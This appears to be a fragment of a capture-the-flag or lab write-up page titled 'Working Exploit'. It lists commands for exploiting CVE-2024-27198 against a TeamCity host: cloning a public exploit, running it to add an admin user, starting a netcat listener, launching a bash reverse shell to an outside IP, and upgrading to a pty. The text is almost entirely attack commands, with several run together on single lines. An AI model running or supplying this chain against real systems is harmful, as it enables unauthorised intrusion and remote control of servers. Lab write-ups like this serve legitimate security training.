http




Working Exploit






Last updated










Last updated
echo "$scrutiny onlyrands.com" | sudo tee -a /etc/hosts && echo "$scrutiny teams.onlyrands.com" | sudo tee -a /etc/hosts# Clone the repo
git clone https://github.com/Chocapikk/CVE-2024-27198.git
# Get into its folder
cd CVE-2024-27198
# Install requirements
temp_env # My custom script to make env temp
pip install -r requirements.txt
# Run the exploit
python3 exploit.py -u http://teams.onlyrands.com --add-user --payload-type linuxsudo rlwrap -cAr nc -lnvp 80bash -c "bash -i >& /dev/tcp/192.168.45.244/80 0>&1"(command -v python && python -c 'import pty; pty.spawn("/bin/bash");') || (command -v python3 && python3 -c 'import pty; pty.spawn("/bin/bash");')